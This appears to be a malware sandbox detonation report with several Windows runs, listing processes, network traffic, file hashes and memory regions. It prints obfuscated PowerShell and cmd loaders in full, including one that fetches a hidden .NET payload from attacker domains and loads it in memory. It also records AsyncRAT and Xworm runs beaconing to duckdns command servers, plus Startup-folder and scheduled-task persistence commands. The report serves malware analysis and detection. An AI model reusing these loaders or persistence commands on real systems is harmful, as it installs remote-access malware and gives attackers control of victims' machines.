memory/2600-182-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-184-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-186-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/3564-194-0x0000000006E80000-0x00000000070B2000-memory.dmp
memory/3268-193-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/3564-196-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/3564-204-0x0000000007130000-0x0000000007352000-memory.dmp
memory/3268-337-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/376-479-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/3268-481-0x0000000004F00000-0x0000000004F10000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
157s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/2280-0-0x00000174EB780000-0x00000174EB7A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klazp0bt.lvc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2280-10-0x00007FFDD7DA0000-0x00007FFDD8861000-memory.dmp
memory/2280-11-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-12-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-13-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-14-0x00007FFDD7DA0000-0x00007FFDD8861000-memory.dmp
memory/2280-15-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-16-0x00000174CF850000-0x00000174CF860000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4788 wrote to memory of 2116 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4788 wrote to memory of 2116 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2116 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2116 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1464 wrote to memory of 3596 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1464 wrote to memory of 3596 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 172.67.203.108:443 | nanoshield.pro | tcp |
| US | 8.8.8.8:53 | 108.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 23.53.113.159:80 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/2116-0-0x00000230643E0000-0x0000023064402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omfb5zsh.ke4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2116-10-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
memory/2116-12-0x0000023062230000-0x0000023062240000-memory.dmp
memory/2116-11-0x0000023062230000-0x0000023062240000-memory.dmp
memory/1464-13-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
memory/1464-23-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp
memory/1464-24-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp
memory/1464-25-0x0000018E8C5E0000-0x0000018E8C5F0000-memory.dmp
memory/1464-26-0x0000018E8C570000-0x0000018E8C5BE000-memory.dmp
memory/3596-32-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
memory/3596-37-0x00000252F6B00000-0x00000252F6B10000-memory.dmp
memory/3596-38-0x00000252F6B00000-0x00000252F6B10000-memory.dmp
memory/3596-45-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 48874fdc03476cb442d506f5bb796f70 |
| SHA1 | 2dedcc271d935fe842f7cb4cc03873b6f688d29d |
| SHA256 | 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0 |
| SHA512 | 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/1464-49-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
memory/2116-52-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
122s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2972 set thread context of 2984 | N/A | C:\Users\Admin\AppData\Local\Temp\fresh.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fresh.exe
"C:\Users\Admin\AppData\Local\Temp\fresh.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
Files
memory/2972-0-0x00000000002B0000-0x00000000002DE000-memory.dmp
memory/2972-1-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2972-2-0x0000000004A80000-0x0000000004AC0000-memory.dmp
memory/2984-3-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-4-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-6-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-5-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2984-9-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-11-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2984-13-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2972-16-0x0000000074110000-0x00000000747FE000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bagdg.duckdns.org | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | bagdg.duckdns.org | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| US | 8.8.8.8:53 | bagdg.duckdns.org | udp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
| GB | 154.30.255.175:8887 | bagdg.duckdns.org | tcp |
Files
memory/3964-0-0x0000000002AF0000-0x0000000002B26000-memory.dmp
memory/3964-1-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/3964-3-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3964-2-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3964-4-0x0000000005660000-0x0000000005C88000-memory.dmp
memory/3964-5-0x0000000005460000-0x0000000005482000-memory.dmp
memory/3964-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5rillfw.try.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3964-7-0x0000000005DB0000-0x0000000005E16000-memory.dmp
memory/3964-17-0x0000000005F00000-0x0000000006254000-memory.dmp
memory/3964-18-0x0000000006310000-0x000000000632E000-memory.dmp
memory/3964-19-0x0000000006340000-0x000000000638C000-memory.dmp
memory/3964-20-0x0000000006890000-0x00000000068D4000-memory.dmp
memory/3964-21-0x0000000007420000-0x0000000007496000-memory.dmp
memory/3964-22-0x0000000007D20000-0x000000000839A000-memory.dmp
memory/3964-23-0x00000000076C0000-0x00000000076DA000-memory.dmp
memory/4204-24-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/4204-25-0x0000000005240000-0x0000000005250000-memory.dmp
memory/4204-26-0x0000000005240000-0x0000000005250000-memory.dmp
memory/4204-38-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/3964-39-0x0000000005190000-0x00000000051A4000-memory.dmp
memory/3964-41-0x00000000051B0000-0x00000000051C2000-memory.dmp
memory/3964-40-0x00000000051A0000-0x00000000051AE000-memory.dmp
memory/3964-43-0x0000000075380000-0x0000000075B30000-memory.dmp
memory/3964-44-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3964-45-0x0000000005020000-0x0000000005030000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1
Network
Files
memory/1456-4-0x000000001B360000-0x000000001B642000-memory.dmp
memory/1456-5-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/1456-6-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-7-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-8-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-9-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-10-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-11-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-13-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-14-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-15-0x0000000002B00000-0x0000000002B80000-memory.dmp
memory/1456-16-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp
memory/1456-17-0x0000000002B00000-0x0000000002B80000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
110s
Max time network
187s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3604 created 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
Xworm
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
